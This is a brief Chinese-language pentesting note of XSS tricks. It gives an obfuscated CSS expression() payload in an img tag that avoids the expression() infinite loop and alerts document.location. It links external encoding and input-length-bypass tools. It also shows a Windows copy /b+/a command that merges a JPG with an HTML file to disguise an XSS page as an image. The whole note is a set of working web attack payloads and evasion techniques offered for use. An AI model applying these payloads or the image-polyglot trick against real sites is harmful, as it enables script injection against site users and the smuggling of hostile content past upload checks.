完美解决expression()的死循环问题的xss语句:
<img src=”#” style=”Xss:expression(eval(unescape(‘if%28window.x%21%3D%221%22%29%7Balert%28document.location%29%3Bwindow.x%3D%221%22%3B%7D’)));”>
编码工具:
http://www.80pentest.com/tools/encode1.htm
http://www.80pentest.com/tools/encode2.htm
突破输入框长度限制:
http://www.80pentest.com/tools/len.txt
copy合并文件:
copy 111.jpg/b+xss.htm/a xss.jpg
前面放二进制文件(/b),后面放ascii文本文件(/a)。